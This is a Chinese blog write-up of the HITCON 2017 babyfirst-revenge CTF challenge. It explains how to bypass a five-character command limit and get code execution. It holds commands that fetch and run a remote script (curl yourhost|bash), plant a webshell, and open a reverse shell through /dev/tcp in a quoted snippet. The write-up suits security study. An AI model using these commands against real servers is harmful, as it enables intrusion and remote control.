HITCON2017 babyfirst-revenge

最新推荐文章于 2023-01-03 15:58:03 发布
最新推荐文章于 2023-01-03 15:58:03 发布
阅读量3.3k 收藏 7
点赞数 3
分类专栏: CTF题解 文章标签: HITCON CTF 命令注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/calmegm/article/details/80874902
版权


初看这题,完全没有思路???!!!


没辙,只能找大佬,看了网上各路大神的思路,从看不懂writeup到慢慢理解原理,学习了~多数writeup思路差不多,总归是利用\来多次输入命令,绕过长度限制,有的人直接curl xxx(不用ls -t这个我没有成功,因为是在构造不出ip地址各种进制的序列问题),痛苦~~


关键一:绕过5位长度限制

要想绕过长度限制执行多条命令,显然会想到先将命令放到文件中取执行。第一个问题就是如何写文件?

> (右尖括号) 在linux起输出重定向的作用

>1 可以生成一个文件名为1的文件


ls 显示列表

这是linux中的常用命令,该命令可显示列表,这里为什么要用到这个命令呢,其实跟我们的上一步中通过重定向生成的特殊文件名有关。我们通过ls>x,可以讲列表名输出重定向到x文件中,这样我们产生的文件名即可被利用。

\(反斜杠) Linux的命令执行中支持命令换行 需要用到反斜杠\ 写到最后面(即使中间有未识别的命令也不影响其执行)


关键二:ls 排序问题(有反转)

这个问题就搞了至少半天,网上给出的例子在kali、Ubuntu中呈现的都是完全不一样的结果,尤其是针对字母数字混合其他特殊字符的情况。


一开始的想法就是从第一个字母开始排序,特殊字符在前、数字中间、字母最后。直到我试了-a


-a 没有出现在最前面。

ls -l的默认排序方式手册上只写了是alphabetically(字典序),经过测试发现ls排序方式是忽视字母大小写,数字排在字母前面,无视数字和英文字母之外的字符。

如果我们现在需要`ls -t>y`,那应该如何提交参数呢?如下:

1.cmd=>l\\

2.cmd=>s\ \\

3.cmd=-t\\

4.cmd=>\>y


这种情况下默认排序正好是我们想要的顺序。

继续执行`ls>_`,讲文件列表输出到_中


这时候`ls -t>y`这个命令就存在_文件中,我们通过sh _即可执行命令,之所以要先ls -t,其实是因为ls的默认排序是在是很难按照想要的顺序构造命令,加上参数-t,我们可以按时间进行排序(最新的在上),这样我们的命令就很好存放到文件中了,不用再取细心构造(官方writeup也是如此,只是未能在我的测试环境中测试成功)。

接下来,我们再把`curl yourhost>z`命令分段输入进去(倒着输入)


以上只能把命令行中测试成功,但在php执行后中却完全不一样!!!!不一样


如图


通过php执行生成的_的内容序列并非和我们在linux命令行中看到的一样!-t、>y反而在最前面!

经过 Abyss 大神的指导,得知 ls 排序和环境变量LC_COLLATE有关!


php默认的应该是c,这里给除另一个可参考的材料,来自知乎 https://www.zhihu.com/question/273928679

所以这里各位还是采用官方给出的构造`ls -t>y`

    # generate `ls -t>y` file
    '>ls\\', 
    'ls>_', 
    '>\ \\', 
    '>-t\\', 
    '>\>y', 
    'ls>>_',

通过追加的方式讲第二次ls的内容-t和-y与第一次ls生成的ls集合成一条命令。生成的_文件的内容大致如下:


这样`ls -t>y`命令就构造完毕了

关键三:如何利用?

代码可以构造了,那该如何利用呢?综合网络上的例子一种通过curl(也有人用wget)下载脚本,脚本可以是php脚本,bash脚本,可以生成webshell,也可以反弹shell。

  • 写WEBSHELL

140.143.xx.xx这是我的一台vps,我在根目录下面放了要执行php代码(参考了php写一句话木马为例)


我们可以看到输入的curl命令的顺序都是乱的,这是后就好借助之前生成的`ls -t>y`

执行`sh _`


命令执行后生成了新的文件y,y中包含了需要执行的curl语句。然后,继续执行`sh y`,执行语句,生成z文件。


z文件内容即为需要执行的代码,通过`php z`即可执行php生成fun.php文件。爱春秋平台的测试环境没法直接访问sandbox,所以该方法无法使用。

  • 反弹shell

讲服务器的目录文件替换为bash脚本,如下:


对应的curl语句修改一下,改为`curl yourhost|bash`即可。(vps在疼讯云上,4444可能有所限制,我换成8181就行了)


关键四:flag在哪里?


整理下心情,搜索下flag。

在 home 目录下找到 fl4444g 文件夹,里面有个README.txt


提示flag在mysql数据库,fl4444g/Su*****应该就是用户名密码


这里不知道为什么-e用不了,只能交互+exit输出内容(知道原因了,-ufl4444g -pxxx,不要用空格就行)


另外,还有人找到在根目录下的 run.sh 也有数据库账户信息。



这一道题,可以总结的东西很多。

6um1n
关注
专栏目录
Hitcon2017 babyfirst-revenge复现
0verWatch的博客
09-06 2838
前言 开学了还是得学习的,复现一波题目来玩玩,其实是实力不够不能去打网鼎杯emmm 正文 先从Hitcon2017 babyfirst-revenge这一个题目,总结一下还是学到很多东西的 复现地址 https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge 这是题目回...
BabyFirst-Revenge
heySister
09-15 866
前几天做ctf交流群的入门题…然后顺着就找到了BabyFirst系列的题目,所以打算做一做。 首先,参考了https://www.jianshu.com/p/a77e956d9941 ,里面也有对应HITCON各年比赛的docker环境,方便复现题目。 打开页面,代码很短,而且就很直白地告诉我们,这里可以有命令执行,就看能不能绕过。 <?php $sandbox = '/w...
HITCON 2017 babyfirst-revenge命令执行绕过二)
郁离歌丶的博客
04-30 1026
昨天不知道怎么了忘记发出去了,和今天的合起来一起发23333333今天国赛,体验了一把被二进制大手子带飞的感觉。贼爽。web1太简单,web2太难,web+pwn我就没做出来过。然后国赛也成为二进制的舞台了(就好像什么比赛不是二进制的天下一样。所以我这只狗又来学web了。接上昨天的,我想本地搭一个,但是想了好久,到底怎么弄,我想看看实现好的环境。搜一波发现有人用docker搭过了。但是我是win1...
(4)5位可控字符下的任意命令执行-----另一种解题方法
大方子
11-06 3323
有道分享链接:https://note.youdao.com/ynoteshare1/index.html?id=55e53db4f857d81515e57e104777b88b&type=note 前言: 题目是hitcon-ctf-2017babyfirst-revenge,之前是针对babyfirst-revenge-v2来进行学习研究的 <?php ...
HITCON 2017 babyfirst-revenge命令执行绕过三)
郁离歌丶的博客
05-02 890
今天写了下红帽杯要交的wp,颓废了一会儿,喷了一发iscc,然后ak了iscc目前放的题。开始今天的修炼了。其实已经12点,注定今天又做不了多少。估计要被梅子酒笑话了md...再理一下之前有的思路:1.利用'&gt;'+'字符'+'\'+'\'几个字符创建文件(ps:'\'是会把后面的转义掉的,所以如果要让他出现在文件名中,就得用两个\\2.使用ls串接命令可以用ls -t   (ps:ls -t...
HITCON2017 BabyFirst Revenge (短命令执行)
a3320315的博客
01-12 951
0x01 源码 <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) && strlen($_GET['cmd']) <=...
HITCON 2017 babyfirst-revenge命令执行绕过四)
郁离歌丶的博客
05-03 704
中午睡了一觉,醒来两点多了,发现几个群里又有人在黑我这个萌新菜比了.....然后用两个多小时ak了iscc放的题,这让我忍不住再次喷一波iscc...老子都ak了排名还5、60名...就因为昨天写红帽杯要交的wp没打....我真tm无语...算了算了不喷了。开始今天的修炼!在远程放好如下内容:bash -c "bash -i &gt;&amp; /dev/tcp/vpsip/vpsport 0&l...
HITCON 2017 babyfirst-revenge-v2(命令执行绕过五)
郁离歌丶的博客
05-07 1224
题目地址:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_2/index.php发现和上一题大体相似,但是发现有一个不一样,长度从5变成了4,没办法利用&gt;&gt;二次写入了。但是我们如果就这样是没法儿按照字典序直接写入ls -t&gt;g到文件的。 因为这一串无论怎么分割写入都无法遵从字典序或是字典序的逆序。然...
Hitcon2017 babyfirst-revenge v2复现
0verWatch的博客
09-18 1109
这个题目的条件更加苛刻了,先放个源码 &lt;?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) &amp;&amp; strlen($_GET['c...
HITCON2017 babyfirst-revenge v2
forbidd3n,keep going
05-22 586
被5虐过后,现在到4了,没想到难度大很多,这些就记一下总结下来的方法和姿势。先总结ls -t的方法,后面再补充tar的姿势。 1、构造ls -t 在上一题中我们大概知道了构造ls -t的要素,但是在本题中,由于长度的进一步限制,`ls>>_`将无法使用。这就要使用到其他技巧。 技巧0:* 在当前工作目录下使用*命令,会将目录名当作命令执行(顺序) 执行*即-t ...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理.....................................................................................................................................................................................................................
Babyfirst-Revenge
Da2kSupr3m3的博客
01-03 605
[HITCON 2017]Babyfirst-Revenge v1&v2
[HITCON 2017]SSRFme
feng的博客
12-12 1026
知识点 代码审计 SSRF WP 其实是一道很简单的SSRF的题目,但是自己又没完完全全的做出来,卡在了一些奇奇怪怪的地方。 首先进入环境审一下代码: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; }
hitcon_2017_ssrfme
o3Ev的博客
05-02 409
hitcon_2017_ssrfme 题目: 打开环境,得到: <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pathinfo($_GET["file
BabyFirst-Revenge-V2 Writeup
heySister
09-19 865
BabyFirst-Revenge-V2 题目进行升级,允许输入的长度变成4,那之前的ls&gt;&gt;B 命令就无法绕过对长度对限制了。 用到的知识点: 1. Linux下使用 * 的作用:匹配当前目录下的文件名,并执行拼接后的语句; 2. dir指令和ls指令的功能相同,都是以字典序将所在目录下的文件名输出; 3. rev指令可以将某一文件内容以倒序输出。 *指令执行结果: (相当于执行...
hitcon 2017 ghost in the heap解题记录
qq_35467337的博客
03-08 414
hitcon 2017的ghost in the heap是4ngleboy这位日堆大佬出的题目,处于艰难看懂writeup的解断
HITCON 2017 babyfirst-revenge命令执行绕过一)
郁离歌丶的博客
04-28 2840
院科协换届...10点才去大活打开电脑...修炼第一天怕是只能看个题了....题目链接:https://github.com/otakekumi/CTF-Challenge/blob/master/PHP/chall_1/Chall_1.md审计了一下,大概就是考linux命令执行的绕过,命令长度限制了。直接对着代码想了好久,无果。梅子酒说先搭起环境来,再慢慢搞。WEB学习第一步:搭环境,改bug...
HITCON2017-Web-writeup
无节操
10-27 1851
HITCON2017-Web-writeupProblemsbabyfirst-revenge Problems babyfirst-revenge Description: <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @ch...
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值